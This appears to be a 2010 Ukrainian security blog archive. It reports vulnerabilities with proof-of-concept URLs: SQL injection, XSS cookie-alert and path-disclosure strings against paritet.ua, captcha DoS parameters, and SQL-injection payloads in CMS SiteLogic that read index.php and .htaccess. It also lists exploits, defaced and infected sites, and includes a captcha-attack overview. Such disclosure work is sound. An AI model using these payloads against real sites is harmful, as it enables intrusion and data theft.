Архів за Квітень, 2010

Уразливості на www.paritet.ua

19:04 09.04.2010

07.10.2009

У лютому, 08.02.2009, я знайшов SQL Injection, Full path disclosure, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.paritet.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.04.2010

SQL Injection:

http://www.paritet.ua/?mid=9%20and%20version()=5

Full path disclosure:

http://www.paritet.ua/?mid=-1

SQL DB Structure Extraction:

http://www.paritet.ua/?mid=-1′

XSS:

http://www.paritet.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені. Окрім SQL Injection уразливості, що дуже несерйозно.

Добірка експлоітів

15:23 09.04.2010

В даній добірці експлоіти в веб додатках:

  • PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability (деталі)
  • PHPope <= 1.0.0 Multiple Remote File Inclusion Vulnerabilities (деталі)
  • FreeSchool <= 1.1.0 Multiple Remote File Inclusion Vulnerabilities (деталі)
  • Ticket Support Script (ticket.php) Remote Shell Upload Vulnerability (деталі)
  • Zeroboard 4.1 pl7 now_connect() Remote Code Execution Exploit (деталі)
  • Mambo Component com_zoom (catid) Blind SQL Injection Vulnerability (деталі)
  • Joomla Compenent com_joomlub (aid) SQL Injection Vulnerability (деталі)
  • Ipswitch WS_FTP 12 Professional Remote Format String PoC (деталі)
  • Safari 3.2.3 (Win32) JavaScript (eval) Remote DoS Exploit (деталі)
  • Agoko CMS <= 0.4 Remote Command Execution Exploit (деталі)

Уразливості в Sebo - webstore

23:56 08.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в Sebo - webstore (e-commerce система). Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/libs/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC.

DoS:

http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі Sebo - webstore 0.14 та попередні версії.

Anthology of attacks via captchas

22:45 08.04.2010

This is English version of my Anthology of attacks via captchas article.

Earlier I made anthology of attacks via redirectors (opened and closed) in my articles Redirectors: the phantom menace and Attacks via closed redirectors. And in this article I’ll make anthology of attacks via captchas.

CAPTCHA - it’s security web applications, which designed to protect web sites against automated requests. But captchas not only badly handle with protection against automated requests, but they also create possibilities for other attacks at the sites and their visitors. There are many different attacks via captchas, which I’ll tell about in this article.

Attacks via captchas.

Besides direct captcha bypass, there also can be made many other attacks via them. Here is a list of all attacks via captchas which I know:

  • Captcha bypass.
  • Redirector attacks.
  • Cross-Site Scripting attacks.
  • SQL Injection attacks.
  • CSRF attacks.
  • Information leakages.
  • Denial of Service attacks.

Captcha bypass.

Multiple Insufficient Anti-automation vulnerabilities occur in captchas, which allow to bypass captchas for sending of automated requests. Which I told about in details in my project Month of Bugs in Captchas.

Redirector attacks.

In Google’s captcha there is Redirector vulnerability, which allow to redirect visitors to arbitrary sites.

Cross-Site Scripting attacks.

In captcha for Nucleus and in plugins Peter’s Random Anti-Spam Image, Math Comment Spam Protection, Captcha!, Cryptographp, WP-ContactForm and CapCC for WordPress there are Cross-Site Scripting vulnerabilities (reflected and persistent), which can be used for XSS attacks.

SQL Injection attacks.

In captcha for Nucleus and in plugin CapCC for WordPress there are SQL Injection vulnerabilities, which can be used for attacks on the sites.

CSRF attacks.

In plugins Captcha! and CapCC for WordPress there are Cross-Site Request Forgery vulnerabilities, which can be used for CSRF-attacks. Including for exploitation of Insufficient Anti-automation (in both captchas) and SQL Injection (in second captcha) vulnerabilities.

Information leakages.

In captcha for Nucleus there are Full path disclosure and SQL DB Structure Extraction vulnerabilities, and in plugin CapCC for WordPress there is Full path disclosure vulnerability. Which lead to leakage of information at the site.

Denial of Service attacks.

There can be conducted DoS attacks via captchas (via SQL Injection and Denial of Service vulnerabilities in them). Which I wrote about in details in my article DoS attacks via captchas.

Conclusions.

Instead of protecting of web sites against automated requests, captchas often pose a threat to security of web sites and their visitors. So developers of captchas and owners of web site which use them need always to check security of their captchas.

Похакані сайти №91

20:01 08.04.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.globallogic.com.ua (хакером Miss-BogoSsaX) - 27.03.2010, зараз сайт вже виправлений адмінами
  • http://l.ua (хакером AvareC) - 06.04.2010, зараз сайт вже виправлений адмінами
  • http://cgpa.com.ua (хакером System_Invisible з AzDefacer) - 03.04.2010, зараз сайт вже виправлений адмінами
  • http://vforme.net (хакерами з UAH-Crew)
  • http://lemus.com.ua (хакером KNS KDG)

Антивірус для сайтів McAfee SiteAdvisor

17:20 08.04.2010

Продовжуючи тему антивірусів для сайтів, розповім вам про ще один подібний сервіс. Це SiteAdvisor від McAfee. І це ще один конкурент моїй Web VDS.

Компанія McAfee є відомим розробником антивірусних продуктів і вона також пропонує продукти і сервіси для захисту від вірусів на веб сайтах. Зокрема, як я вже розповідав, компанія надає свою технологію Yahoo, для захисту користувачів даної пошукової системи від шкідливих сайтів.

Також компанія має веб сервіс McAfee SiteAdvisor. Він подібний сервісу Norton Safe Web від Symantec. За допомогою даного сервісу можна перевірити стан інфікованості веб сайтів.

Щоб скористатися сервісом McAfee SiteAdvisor, потрібно зайти на даний сайт і вказати URL в рядку пошуку, або напряму зайти на сторінку звіту про сайт (вказавши URL):

http://www.siteadvisor.com/sites/site.com

Можете подитивитися на роботу сервіса на прикладі siteadvisor.com:

http://www.siteadvisor.com/sites/siteadvisor.com

Також компанія випускає плагін до браузерів McAfee SiteAdvisor Software, що інтегрований з даним онлайновим сервісом. Плагін представляє собою тулбар і є подібним до плагіна Norton Safe Web Lite від Symantec.

Він дає більший захист ніж антивірусні системи вбудовані в пошуковці, бо тулбар захистить не тільки на сайтах пошуковців, але й на усіх інших сайтах (головне, щоб дані сайти були в базі). Але врахуючи низьку кількість сайтів в базі McAfee, ефективність їхнього тулбара невелика.

Безпека сайтів про безпеку 17

22:42 07.04.2010

10.02.2010

Продовжу тему безпеки секюріті сайтів, яку я піднімав в попередніх записах Безпека сайтів про безпеку, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 та 16.

Ось нова добірка уразливих секюріті сайтів:

Всім спецслужбам та security проектам слід приділяти більше уваги безпеці власних сайтів.

07.04.2010

Ще одна добірка уразливих секюріті сайтів:

Секюріті проектам та компаніям варто більше слідкувати за безпекою власних сайтів.

Нові уразливості в CMS SiteLogic

19:01 07.04.2010

09.02.2010

У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

07.04.2010

SQL Injection:

http://site/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включення index.php.

Directory Traversal (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Включення .htaccess.

Full path disclosure:

http://site/?fun=-1

Інфіковані сайти №23

15:29 07.04.2010

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://suninbev.com.ua - інфекція була виявлена 03.03.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://kivi-x.info - інфекція була виявлена 05.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://design.lutsk.ua - інфекція була виявлена 02.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 7 разів протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://ukrtel.net - офіційний сайт ВАТ Укртелеком (сайт державної компанії) - інфекція була виявлена 05.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 21 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://dnop.kiev.ua - інфікований державний сайт - інфекція була виявлена 02.02.2010. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими сайтами, інфіковані сайти suninbev.com.ua, kivi-x.info та ukrtel.net також хостить в себе Укртелеком.

Численні уразливості в Microsoft Internet Explorer

22:43 06.04.2010

Виявлені численні уразливості в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6 і 7 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server.

Численні уразливості використовуються для прихованого встановлення шкідливого коду.

  • Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability (деталі)
  • Microsoft Internet Explorer TIME2 Behavior Remote Code Execution Vulnerability (деталі)
  • Microsoft Internet Explorer ‘onreadystatechange’ Use After Free Vulnerability (деталі)
  • Microsoft Security Bulletin MS10-018 - Critical Cumulative Security Update for Internet Explorer (980182) (деталі)